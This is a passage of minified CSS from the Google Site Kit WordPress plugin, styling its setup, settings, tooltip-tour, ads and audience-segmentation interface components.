.googlesitekit-user-input__preview-actions .googlesitekit-cta-link{color:#6c726e}.googlesitekit-plugin .googlesitekit-user-input__preview-group--individual-cta{position:relative}.googlesitekit-plugin .googlesitekit-user-input__preview--editing .googlesitekit-user-input__preview-group--individual-cta:not(.googlesitekit-user-input__preview-group--editing){pointer-events:none}.googlesitekit-plugin .googlesitekit-user-input__preview--editing .googlesitekit-user-input__preview-group--individual-cta:not(.googlesitekit-user-input__preview-group--editing)::after{background-color:#cbd0d3;content:"";height:calc(100% + 13px);opacity:.75;position:absolute;top:0;z-index:1}@media(min-width: 961px){.googlesitekit-plugin .googlesitekit-user-input__preview--editing .googlesitekit-user-input__preview-group--individual-cta:not(.googlesitekit-user-input__preview-group--editing)::after{margin-left:-24px;margin-left:calc(var(--mdc-layout-grid-margin-desktop, 24px) * -1);width:calc(100% + 24px * 2);width:calc(100% + var(--mdc-layout-grid-margin-desktop, 24px) * 2)}}@media(min-width: 601px)and (max-width: 960px){.googlesitekit-plugin .googlesitekit-user-input__preview--editing .googlesitekit-user-input__preview-group--individual-cta:not(.googlesitekit-user-input__preview-group--editing)::after{margin-left:-16px;margin-left:calc(var(--mdc-layout-grid-margin-tablet, 16px) * -1);width:calc(100% + 16px * 2);width:calc(100% + var(--mdc-layout-grid-margin-tablet, 16px) * 2)}}@media(max-width: 600px){.googlesitekit-plugin .googlesitekit-user-input__preview--editing .googlesitekit-user-input__preview-group--individual-cta:not(.googlesitekit-user-input__preview-group--editing)::after{margin-left:-16px;margin-left:calc(var(--mdc-layout-grid-margin-phone, 16px) * -1);width:calc(100% + 16px * 2);width:calc(100% + var(--mdc-layout-grid-margin-phone, 16px) * 2)}}.googlesitekit-plugin .googlesitekit-user-input__preview--editing .googlesitekit-user-input__preview-group--individual-cta:not(.googlesitekit-user-input__preview-group--editing):first-child::after{height:calc(100% + 26px);top:-13px}.googlesitekit-plugin .googlesitekit-user-input__preview--editing .googlesitekit-user-input__preview-group--individual-cta:not(.googlesitekit-user-input__preview-group--editing):last-child::after{border-radius:0 0 24px 24px}@media(min-width: 961px){.googlesitekit-plugin .googlesitekit-user-input__preview--editing .googlesitekit-user-input__preview-group--individual-cta:not(.googlesitekit-user-input__preview-group--editing):last-child::after{height:calc(100% + 24px);height:calc(100% + var(--mdc-layout-grid-margin-desktop, 24px))}}@media(min-width: 601px)and (max-width: 960px){.googlesitekit-plugin .googlesitekit-user-input__preview--editing .googlesitekit-user-input__preview-group--individual-cta:not(.googlesitekit-user-input__preview-group--editing):last-child::after{height:calc(100% + 16px);height:calc(100% + var(--mdc-layout-grid-margin-tablet, 16px))}}@media(max-width: 600px){.googlesitekit-plugin .googlesitekit-user-input__preview--editing .googlesitekit-user-input__preview-group--individual-cta:not(.googlesitekit-user-input__preview-group--editing):last-child::after{height:calc(100% + 16px);height:calc(100% + var(--mdc-layout-grid-margin-phone, 16px))}}.googlesitekit-plugin .googlesitekit-user-input__select-options{margin:0 0 20px;max-width:100%;width:max-content}.googlesitekit-plugin .googlesitekit-user-input__select-option{align-items:center;display:flex;padding:20px 0}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-user-input__select-option{padding:10px 0}}.googlesitekit-plugin .googlesitekit-user-input__select-option .mdc-radio{margin-right:8px}.googlesitekit-plugin .googlesitekit-user-input__select-option label{color:#161b18;font-size:14px;letter-spacing:.25px;line-height:1.43}.googlesitekit-plugin .googlesitekit-user-input__select-option:not(:last-child){border-bottom:1px solid #ebeef0}.googlesitekit-plugin .googlesitekit-user-input__text-options{border:2px solid #999f9b;border-radius:4px;margin:13px 0 8px;padding:0 12px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-user-input__text-options{margin-top:0}}.googlesitekit-plugin .googlesitekit-user-input__text-options>div{margin:12px;margin-left:0}.googlesitekit-plugin .googlesitekit-user-input__text-options svg{color:#fff}.googlesitekit-plugin .googlesitekit-user-input__text-options .mdc-text-field,.googlesitekit-plugin .googlesitekit-user-input__text-options .mdc-text-field__input{background-color:transparent}.googlesitekit-plugin .googlesitekit-user-input__text-options .mdc-text-field{height:32px;width:100%}.googlesitekit-plugin .googlesitekit-user-input__text-options .mdc-text-field__input{border:none;margin:0;padding:0 6px}.googlesitekit-plugin .googlesitekit-user-input__text-options .mdc-text-field__input::placeholder{color:#b8bdb9}.googlesitekit-plugin .googlesitekit-user-input__text-options .mdc-line-ripple{display:none}.googlesitekit-plugin .googlesitekit-user-input__text-option{align-items:center;background-color:#b8e5ca;border-radius:8px;color:#265c3b;display:inline-flex;font-size:14px;font-weight:500;letter-spacing:.25px;line-height:1.43;padding:3px 3px 3px 12px;white-space:nowrap}.googlesitekit-plugin .googlesitekit-user-input__text-option button{border-radius:100px;margin:0;min-width:35px;padding:0 12px}.googlesitekit-plugin .googlesitekit-user-input__text-option button svg path{fill:#265c3b}.googlesitekit-plugin .googlesitekit-user-input__text-option .mdc-text-field{width:auto}.googlesitekit-plugin .googlesitekit-user-input__text-option .mdc-text-field .mdc-text-field__input{color:#265c3b;font-weight:500}.googlesitekit-plugin .googlesitekit-user-input__text-option+div{margin-top:0}.googlesitekit-plugin .googlesitekit-user-input__text-options>div:last-child{margin-right:0}.googlesitekit-plugin .googlesitekit-user-input__buttons button{letter-spacing:.25px}.googlesitekit-plugin .googlesitekit-user-input__buttons button.mdc-button{border:none;padding:10px 16px}.googlesitekit-plugin .googlesitekit-user-input__buttons button.googlesitekit-cta-link{color:#6c726e}@media(max-width: 599px){.googlesitekit-plugin .googlesitekit-user-input__buttons button span.googlesitekit-user-input__responsive-text{display:none}}.googlesitekit-plugin .googlesitekit-metric-selection .googlesitekit-user-input__footer-container--fullscreen{bottom:0;left:160px;position:fixed;width:calc(100vw - 160px);z-index:99}.googlesitekit-plugin .googlesitekit-metric-selection .googlesitekit-user-input__footer-container--fullscreen .googlesitekit-selection-panel-footer{background:#fff;border-top:1px solid #ebeef0;bottom:0;padding:24px 36px;position:static}.googlesitekit-plugin .googlesitekit-metric-selection .googlesitekit-user-input__footer-container--fullscreen .googlesitekit-selection-panel-footer .googlesitekit-selection-panel-footer__content{margin-top:0}@media(max-width: 599px){.googlesitekit-plugin .googlesitekit-metric-selection .googlesitekit-user-input__footer-container--fullscreen .googlesitekit-selection-panel-footer .googlesitekit-selection-panel-footer__item-count{order:1;text-align:left;width:100%}}.googlesitekit-plugin .googlesitekit-metric-selection .googlesitekit-user-input__footer-container--fullscreen .googlesitekit-selection-panel-footer .googlesitekit-selection-panel-footer__actions{justify-content:space-between;width:100%}@media(max-width: 599px){.googlesitekit-plugin .googlesitekit-metric-selection .googlesitekit-user-input__footer-container--fullscreen .googlesitekit-selection-panel-footer .googlesitekit-selection-panel-footer__actions{flex-wrap:wrap;justify-content:flex-end}}@media(max-width: 599px){.googlesitekit-plugin .googlesitekit-metric-selection .googlesitekit-user-input__footer-container--fullscreen .googlesitekit-selection-panel-footer .googlesitekit-selection-panel-footer__actions button{order:2}}.googlesitekit-plugin .googlesitekit-metric-selection .googlesitekit-user-input__footer-container--fullscreen .googlesitekit-selection-panel-error{padding:14px 48px}.googlesitekit-plugin .googlesitekit-metric-selection .googlesitekit-module-page .googlesitekit-user-input__content{margin-bottom:30px;padding-bottom:30px}.sb-show-main .googlesitekit-plugin .googlesitekit-metric-selection .googlesitekit-user-input__footer-container--fullscreen{left:0;width:100vw}.auto-fold .googlesitekit-plugin .googlesitekit-metric-selection .googlesitekit-user-input__footer-container--fullscreen{left:0;width:100vw}@media(min-width: 783px){.auto-fold .googlesitekit-plugin .googlesitekit-metric-selection .googlesitekit-user-input__footer-container--fullscreen{left:36px;width:calc(100vw - 36px)}}@media(min-width: 960px){.auto-fold .googlesitekit-plugin .googlesitekit-metric-selection .googlesitekit-user-input__footer-container--fullscreen{left:160px;width:calc(100vw - 160px)}}.folded .googlesitekit-plugin .googlesitekit-metric-selection .googlesitekit-user-input__footer-container--fullscreen{left:36px;width:calc(100vw - 36px)}.googlesitekit-showing-feature-tour .react-joyride__overlay{mix-blend-mode:multiply !important}.googlesitekit-showing-feature-tour .react-joyride__spotlight{border-radius:16px !important}.googlesitekit-tour-tooltip .googlesitekit-tooltip-card{--mdc-theme-surface: #3c7251;border-radius:8px;box-shadow:none;color:#fff;position:relative}.googlesitekit-tour-tooltip .googlesitekit-tooltip-card a{-webkit-text-decoration:underline;text-decoration:underline}.googlesitekit-tour-tooltip .googlesitekit-tooltip-card a:active,.googlesitekit-tour-tooltip .googlesitekit-tooltip-card a:hover,.googlesitekit-tour-tooltip .googlesitekit-tooltip-card a:visited{color:#fff}.googlesitekit-tour-tooltip .googlesitekit-tooltip-card a:focus{box-shadow:none;outline:1px dotted #fff;outline-offset:3px}.googlesitekit-tour-tooltip .googlesitekit-tooltip-card svg{color:#fff}.googlesitekit-tooltip-title{color:#fff;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:16px;font-weight:500;letter-spacing:.5px;line-height:1.5;margin-bottom:4px;margin-top:0}.googlesitekit-tooltip-body{box-sizing:border-box;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;font-weight:300;letter-spacing:.25px;line-height:1.43;max-width:352px;padding:24px 56px 2px 24px}.googlesitekit-tooltip-buttons{line-height:1em}.googlesitekit-tooltip-button,.googlesitekit-tooltip-button:not(:disabled){color:#fff;height:auto;letter-spacing:normal;line-height:1em;min-width:initial;padding:0;text-transform:none}.googlesitekit-tooltip-button:focus{outline:1px dotted #fff;outline-offset:6px}.googlesitekit-tooltip-button:not(:first-of-type){margin-left:28px}.googlesitekit-tooltip-close{height:auto;min-width:auto;padding:0;position:absolute;right:29px;top:29px}.googlesitekit-tooltip-close:focus{outline:1px dotted #fff;outline-offset:6px}.googlesitekit-tooltip-close .mdc-button__label{display:none}.mdc-card__actions.googlesitekit-tooltip-actions{align-items:center;display:flex;justify-content:space-between;padding:12px 24px 18px;text-align:right}.googlesitekit-tooltip-indicators{display:flex;margin:0;margin-right:16px;padding:0}.googlesitekit-tooltip-indicator{background:#fff;border-radius:50%;height:8px;list-style:none;margin-bottom:0;margin-right:8px;opacity:.5;width:8px}.googlesitekit-tooltip-indicator.active{opacity:1}.googlesitekit-tour-tooltip__modal_step{max-width:352px;width:calc(100vw - 64px)}.googlesitekit-tour-tooltip__modal_step .googlesitekit-tooltip-body{max-width:100%;padding:16px 16px 0}.googlesitekit-tour-tooltip__modal_step .googlesitekit-tooltip-title{margin-bottom:10px}.googlesitekit-tour-tooltip__modal_step .googlesitekit-tooltip-close{display:none}.googlesitekit-tour-tooltip__modal_step .googlesitekit-tooltip-actions{padding:0 16px}#react-joyride-step-0:has(.googlesitekit-tour-tooltip__fixed-settings-tooltip)>div.__floater{left:170px !important;position:fixed !important;top:113px !important;transform:none !important}#react-joyride-step-0:has(.googlesitekit-tour-tooltip--user-menu)>div.__floater{left:-70px !important;max-width:302px !important}#react-joyride-step-0:has(.googlesitekit-tour-tooltip--user-menu) .__floater__arrow>span{left:195px !important}.folded #react-joyride-step-0:has(.googlesitekit-tour-tooltip__fixed-settings-tooltip)>div.__floater{left:46px !important;top:46px !important}#react-joyride-step-0:has(.googlesitekit-tour-tooltip__fixed-settings-tooltip) div.__floater__arrow>span{margin-top:42px !important;top:0 !important}body.googlesitekit-showing-feature-tour--dashboardSharing .googlesitekit-sharing-settings-dialog .mdc-dialog__container,body.googlesitekit-showing-feature-tour--dashboardSharing .googlesitekit-sharing-settings-dialog .mdc-dialog__scrim{opacity:1;transform:none}body.googlesitekit-showing-feature-tour--dashboardSharing .googlesitekit-sharing-settings-dialog:not(.mdc-dialog--open,.mdc-dialog--opening){display:flex !important;opacity:0;z-index:-99}.googlesitekit-plugin .googlesitekit-text-field-conversion-tracking-id .googlesitekit-text-field-conversion-tracking-id-prefix.mdc-text-field__icon{color:#161b18;left:20px;top:17.5px}.googlesitekit-plugin .googlesitekit-setup-module--ads .googlesitekit-settings-module__fields-group{width:100%}.googlesitekit-plugin .googlesitekit-setup-module--ads .googlesitekit-setup-module__inputs>.googlesitekit-settings-module__fields-group{margin:0}.googlesitekit-plugin .googlesitekit-setup-module--ads .googlesitekit-setup-module__create-account{margin:16px 0 0}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-setup-module--ads .googlesitekit-setup-module__create-account{margin:24px 0 0}}.googlesitekit-plugin .googlesitekit-setup-module--ads .googlesitekit-setup-module__action{margin-bottom:32px}.googlesitekit-plugin .googlesitekit-setup-module--ads .googlesitekit-setup-module--ads--setup-container{align-items:center;position:relative}.googlesitekit-plugin .googlesitekit-setup-module--ads .googlesitekit-setup-module--ads--setup-container .googlesitekit-setup-module__action{margin-bottom:0;margin-top:20px}.googlesitekit-plugin .googlesitekit-setup-module--ads .googlesitekit-setup-module--ads--setup-container h3{margin-top:0}.googlesitekit-plugin .googlesitekit-setup-module--ads .googlesitekit-setup-module--ads--setup-container .align-top{align-self:flex-start}.googlesitekit-plugin .googlesitekit-setup-module--ads .googlesitekit-setup-module--ads--setup-container .instructions{margin-top:5px}.googlesitekit-plugin .googlesitekit-setup-module--ads .googlesitekit-setup-module--ads--setup-container .divider{align-items:center;display:flex;height:28px;justify-content:center;margin:10px 0 28px;position:relative;text-align:center}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-setup-module--ads .googlesitekit-setup-module--ads--setup-container .divider{display:initial;height:100%;margin:unset}}.googlesitekit-plugin .googlesitekit-setup-module--ads .googlesitekit-setup-module--ads--setup-container .divider-line{background:#ebeef0;height:1px;position:absolute;width:100%}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-setup-module--ads .googlesitekit-setup-module--ads--setup-container .divider-line{height:100%;left:50%;top:0;width:1px}}.googlesitekit-plugin .googlesitekit-setup-module--ads .googlesitekit-setup-module--ads--setup-container .divider-label{background-color:#fff;color:#6c726e;display:block;font-size:12px;padding:6px 20px;position:relative;z-index:2}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-setup-module--ads .googlesitekit-setup-module--ads--setup-container .divider-label{top:82px}}.googlesitekit-plugin .googlesitekit-setup-module--ads .googlesitekit-setup-module--ads--setup-container .googlesitekit-ads-setup__form{margin-top:20px}@media(min-width: 961px)and (max-width: 1130px){.googlesitekit-plugin .googlesitekit-setup-module--ads .googlesitekit-setup-module--ads--setup-container .googlesitekit-ads-setup__form.googlesitekit-ads-setup__form--pax .googlesitekit-text-field-conversion-tracking-id{width:100%}}.googlesitekit-plugin .googlesitekit-setup-module--ads .googlesitekit-setup-module--ads--setup-container .googlesitekit-ads-setup__form .googlesitekit-ads-setup__ads-id-conflict-warning{margin-top:12px}.googlesitekit-plugin .googlesitekit-setup-module--ads .googlesitekit-setup-module--ads--setup-container button.googlesitekit-button-icon--spinner svg circle{stroke:rgba(0,0,0,.37)}.googlesitekit-plugin .googlesitekit-setup-module--ads.has-pax-flow .mdc-layout-grid__inner{grid-template-columns:1fr}.googlesitekit-plugin .googlesitekit-ads-settings-fields .googlesitekit-settings-module__fields-group-title{margin-bottom:0}.googlesitekit-plugin .googlesitekit-ads-settings-fields p.googlesitekit-settings-module__fields-group-helper-text{color:#6c726e;font-size:14px;font-weight:400;margin-bottom:20px;margin-top:6px}.googlesitekit-plugin .googlesitekit-ads-settings-fields p.mdc-dialog__lead{font-size:14px}.googlesitekit-plugin .googlesitekit-ads-settings-fields .googlesitekit-setup-module__inputs{margin-bottom:34px}.googlesitekit-plugin .googlesitekit-widget .googlesitekit-pax-embedded-app .card-content{padding:0}.googlesitekit-plugin .googlesitekit-widget .googlesitekit-pax-embedded-app .mdc-card.card{border-radius:16px;box-shadow:none;margin-top:0;max-width:unset;padding:16px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-widget .googlesitekit-pax-embedded-app .mdc-card.card{padding:24px}}.googlesitekit-plugin .googlesitekit-widget .googlesitekit-pax-embedded-app .mdc-card.card .notification{margin-top:0}@media(min-width: 600px){.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-woocommerce-redirect .mdc-dialog__surface{padding:40px}}@media(min-width: 960px){.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-woocommerce-redirect .mdc-dialog__surface{max-width:554px}}@media(min-width: 960px){.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-woocommerce-redirect.googlesitekit-dialog-woocommerce-redirect--ads-connected .mdc-dialog__surface{max-width:608px}}.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-woocommerce-redirect .googlesitekit-dialog-woocommerce-redirect__svg-wrapper{margin-bottom:10px;text-align:center}.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-woocommerce-redirect .googlesitekit-dialog-woocommerce-redirect__svg-wrapper svg{display:inline-block}.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-woocommerce-redirect .mdc-dialog__title{font-size:28px;font-weight:400;line-height:1.286;padding:0 0 10px}.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-woocommerce-redirect .mdc-dialog__actions{gap:5px;justify-content:center}@media(min-width: 880px){.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-woocommerce-redirect .mdc-dialog__actions{gap:10px}}@media(min-width: 960px){.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-woocommerce-redirect .mdc-dialog__actions{justify-content:flex-end}}.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-woocommerce-redirect .mdc-dialog__actions .mdc-button--raised svg{margin-left:6px}.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-woocommerce-redirect .mdc-dialog__actions button .MuiCircularProgress-colorPrimary{color:#fff;margin-right:5px}.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-woocommerce-redirect .mdc-dialog__actions button .MuiCircularProgress-colorPrimary svg{margin:0}.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-woocommerce-redirect .mdc-dialog__actions button.mdc-button--tertiary .MuiCircularProgress-colorPrimary{color:#6c726e}.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-woocommerce-redirect .mdc-dialog__actions a.mdc-button--tertiary,.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-woocommerce-redirect .mdc-dialog__actions button.mdc-button--tertiary{border-radius:100px}.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-woocommerce-redirect .mdc-dialog__actions a.mdc-button--tertiary>svg,.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-woocommerce-redirect .mdc-dialog__actions button.mdc-button--tertiary>svg{margin-left:5px}@media(max-width: 599px){.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-woocommerce-redirect .mdc-dialog__actions a.mdc-button--tertiary{padding:8px 5px;text-align:center}}@media(min-width: 389px)and (max-width: 599px){.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-woocommerce-redirect .mdc-dialog__actions a.mdc-button--tertiary{padding:8px 10px}}.googlesitekit-plugin .googlesitekit-ad-blocking-recovery__hero-graphic{margin:0 2rem;text-align:center}.googlesitekit-plugin .googlesitekit-ad-blocking-recovery__hero-graphic svg{max-width:400px}.googlesitekit-plugin .googlesitekit-ad-blocking-recovery__footer{border-top:1px solid #ebeef0;display:flex;flex-direction:column;justify-content:space-between;margin:42px 0 0;padding:14px 24px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-ad-blocking-recovery__footer{align-items:center;flex-direction:row}}.googlesitekit-plugin .googlesitekit-ad-blocking-recovery__steps .googlesitekit-stepper__step-title{letter-spacing:.1px}.googlesitekit-plugin .googlesitekit-ad-blocking-recovery__complete-actions .mdc-button{margin-right:10px}.googlesitekit-plugin .googlesitekit-ad-blocking-recovery__footer-cancel button{color:#6c726e}.googlesitekit-plugin .googlesitekit-settings-module__ad-blocking-recovery-toggles{margin-top:20px}.googlesitekit-plugin .googlesitekit-settings-module__ad-blocking-recovery-toggles .googlesitekit-settings-module__meta-item{margin-bottom:0}.googlesitekit-plugin .googlesitekit-settings-module__ad-blocking-recovery-toggles .googlesitekit-settings-module__meta-item p{left:42px;margin-top:10px;position:relative}.googlesitekit-plugin .googlesitekit-settings-module__ad-blocking-recovery-toggles .googlesitekit-notice{margin-bottom:0}.googlesitekit-plugin .googlesitekit-ad-blocking-recovery__step .googlesitekit-stepper__step-content>p{color:#6c726e;font-size:16px;letter-spacing:.25px}.googlesitekit-plugin .googlesitekit-ad-blocking-recovery__step .googlesitekit-stepper__step-content>p:first-child{letter-spacing:.5px;margin-top:0}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-ad-blocking-recovery__step .googlesitekit-stepper__step-content>p:first-child{margin-top:8px}}.googlesitekit-plugin .googlesitekit-ad-blocking-recovery__step .googlesitekit-stepper__step-content .mdc-form-field{position:absolute}.googlesitekit-plugin .googlesitekit-ad-blocking-recovery__step.googlesitekit-ad-blocking-recovery__step-create-message .googlesitekit-stepper__step-content>p{letter-spacing:.5px}.googlesitekit-plugin .googlesitekit-ad-blocking-recovery__step-place-tags p.googlesitekit-ad-blocking-recovery__error-protection-tag-info{font-size:14px;line-height:1.43;margin:52px 0 20px 34px}.googlesitekit-plugin .googlesitekit-ad-blocking-recovery__step-create-message .googlesitekit-ad-blocking-recovery__create-message-footer-actions{align-items:center;display:flex;flex-wrap:wrap;gap:26px}.googlesitekit-plugin .googlesitekit-ad-blocking-recovery__step-create-message .googlesitekit-ad-blocking-recovery__create-message-footer-actions .googlesitekit-cta-link{color:#6c726e;font-weight:500}.googlesitekit-plugin .googlesitekit-ad-blocking-recovery__step-create-message .googlesitekit-ad-blocking-recovery__create-message-footer{display:inline-block;margin-top:12px}.googlesitekit-plugin .googlesitekit-ad-blocking-recovery__step-create-message p.googlesitekit-ad-blocking-recovery__create-message-footer-note{color:#6c726e;font-size:12px;letter-spacing:.2px;line-height:1.33;margin-top:24px}.googlesitekit-plugin .googlesitekit-settings-module--analytics-4 .googlesitekit-settings-module__fields-group-title+.googlesitekit-setup-module__inputs .googlesitekit-analytics__select-account,.googlesitekit-plugin .googlesitekit-settings-module--analytics-4 .googlesitekit-settings-module__fields-group-title+.googlesitekit-setup-module__inputs .googlesitekit-analytics-4__select-property,.googlesitekit-plugin .googlesitekit-settings-module--analytics-4 .googlesitekit-settings-module__fields-group-title+.googlesitekit-setup-module__inputs .googlesitekit-analytics-4__select-webdatastream{margin-top:8px}.googlesitekit-plugin .googlesitekit-settings-module--analytics-4 .googlesitekit-analytics-enable+.googlesitekit-setup-module__inputs .googlesitekit-analytics__select-property,.googlesitekit-plugin .googlesitekit-settings-module--analytics-4 .googlesitekit-analytics-enable+.googlesitekit-setup-module__inputs .googlesitekit-analytics__select-profile{margin-top:8px}.googlesitekit-plugin .googlesitekit-settings-module--analytics-4 .googlesitekit-analytics-settings-notice{margin-bottom:1rem}.googlesitekit-plugin .googlesitekit-analytics-enable-enhanced-measurement--loading{padding-top:10px}.googlesitekit-plugin .googlesitekit-analytics-enable-enhanced-measurement__progress--settings-edit{margin:0 0 21px}.googlesitekit-plugin .googlesitekit-analytics-enable-enhanced-measurement__progress--settings-view{margin:0 0 13px}.googlesitekit-plugin .googlesitekit-analytics-enable-enhanced-measurement__already-enabled-label{display:flex;gap:6px;margin-top:1px}.googlesitekit-plugin .googlesitekit-analytics-enable-enhanced-measurement__already-enabled-tick{align-items:center;background-color:#3c7251;border-radius:11px;color:#fff;display:flex;flex-shrink:0;height:20px;justify-content:center;margin-left:16px;width:20px}.googlesitekit-plugin .googlesitekit-analytics-enable-enhanced-measurement__already-enabled-tick svg{height:10px;width:10px}.googlesitekit-plugin .googlesitekit-setup-module--analytics.googlesitekit-feature--setupFlowRefresh .googlesitekit-setup-module__inputs{align-items:start}.googlesitekit-plugin .googlesitekit-setup-module--analytics.googlesitekit-feature--setupFlowRefresh .googlesitekit-setup-module__inputs .googlesitekit-setup__step-hint{margin:7px 0 0 15px;padding:0}.googlesitekit-plugin .googlesitekit-setup-module--analytics.googlesitekit-feature--setupFlowRefresh .googlesitekit-setup-module__inputs .mdc-text-field,.googlesitekit-plugin .googlesitekit-setup-module--analytics.googlesitekit-feature--setupFlowRefresh .googlesitekit-setup-module__inputs .mdc-select{width:250px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-setup-module--analytics.googlesitekit-feature--setupFlowRefresh .googlesitekit-setup-module__inputs .mdc-text-field,.googlesitekit-plugin .googlesitekit-setup-module--analytics.googlesitekit-feature--setupFlowRefresh .googlesitekit-setup-module__inputs .mdc-select{width:280px}}.googlesitekit-plugin .googlesitekit-setup-module--analytics.googlesitekit-feature--setupFlowRefresh .googlesitekit-setup-module__select_account{font-size:16px;letter-spacing:.5px;margin-bottom:0}.googlesitekit-plugin .googlesitekit-setup-module--analytics.googlesitekit-feature--setupFlowRefresh .googlesitekit-plugin-conversion-tracking-notice{color:#161b18;font-size:12px;letter-spacing:.2px;margin:23px 0 0}.googlesitekit-plugin .googlesitekit-setup-module--analytics.googlesitekit-feature--setupFlowRefresh .googlesitekit-analytics-setup__form .googlesitekit-analytics-enable-enhanced-measurement .googlesitekit-module-settings-group__helper-text{color:#6c726e;font-size:12px;letter-spacing:.2px;margin:8px 0 0}.googlesitekit-plugin .googlesitekit-setup-module--analytics.googlesitekit-feature--setupFlowRefresh .googlesitekit-analytics-setup__form .googlesitekit-analytics-enable-enhanced-measurement .googlesitekit-analytics-enable-enhanced-measurement__already-enabled-label{font-size:12px;letter-spacing:.2px}.googlesitekit-plugin .googlesitekit-setup-module--analytics.googlesitekit-feature--setupFlowRefresh .googlesitekit-analytics-setup__form .googlesitekit-analytics-enable-enhanced-measurement .googlesitekit-analytics-enable-enhanced-measurement__already-enabled-label+.googlesitekit-module-settings-group__helper-text{margin:4px 0 0}.googlesitekit-plugin .googlesitekit-setup-module--analytics.googlesitekit-feature--setupFlowRefresh .googlesitekit-analytics-setup__form .googlesitekit-analytics-enable-enhanced-measurement .mdc-switch+label+.googlesitekit-module-settings-group__helper-text{margin-left:42px}.googlesitekit-plugin .googlesitekit-setup-module--analytics.googlesitekit-feature--setupFlowRefresh .googlesitekit-analytics-setup__analytics-create-account-info{margin-top:38px;padding-bottom:6px}.googlesitekit-plugin .googlesitekit-setup-module--analytics .googlesitekit-analytics-enable+.googlesitekit-setup-module__inputs .googlesitekit-analytics__select-property,.googlesitekit-plugin .googlesitekit-setup-module--analytics .googlesitekit-analytics-enable+.googlesitekit-setup-module__inputs .googlesitekit-analytics__select-profile{margin-top:8px}.googlesitekit-plugin .googlesitekit-setup-module--analytics .googlesitekit-setup-module__inputs--multiline .googlesitekit-analytics-webdatastreamname{margin-bottom:16px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-setup-module--analytics .googlesitekit-setup-module__inputs--multiline .googlesitekit-analytics-webdatastreamname{margin-bottom:24px}}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile{margin-bottom:16px}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile__header{align-items:center;border-bottom:1px solid #ebeef0;color:#161b18;display:flex;font-size:14px;justify-content:space-between;line-height:16px;padding:25px;width:100%}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile__header .googlesitekit-info-tooltip{color:#108080}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile__header .googlesitekit-audience-segmentation-tile__header-title{display:flex}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile__header .googlesitekit-audience-segmentation-tile__header-title .googlesitekit-info-tooltip{display:inline-block;height:16px;margin-left:5px}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile__metrics>.googlesitekit-audience-segmentation-partial-data-notice{margin:16px 16px 10px}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric{border-bottom:1px solid #ebeef0;display:flex;margin:0 16px;padding:12px 0}@media(min-width: 961px){.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric{margin:0 24px}}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric:last-child{border-bottom:none}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric .googlesitekit-audience-segmentation-tile-metric__icon{align-items:center;color:#6c726e;display:flex;margin-right:4px;min-width:36px;width:36px}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric .googlesitekit-audience-segmentation-tile-metric__icon svg{height:20px;width:20px}@media(min-width: 961px){.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric .googlesitekit-audience-segmentation-tile-metric__icon{justify-content:center;min-width:52px;width:52px}}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric .googlesitekit-audience-segmentation-tile-metric__container{flex-grow:1}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric .googlesitekit-audience-segmentation-tile-metric__container .googlesitekit-audience-segmentation-tile-metric__value{color:#161b18;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:28px;font-weight:400;line-height:32px}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric .googlesitekit-audience-segmentation-tile-metric__container .googlesitekit-audience-segmentation-tile-metric__title{color:#6c726e;font-size:14px;font-weight:400;letter-spacing:.25px;line-height:20px}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric .googlesitekit-audience-segmentation-tile-metric__badge-container{align-items:center;display:flex;flex-direction:row}.googlesitekit-plugin 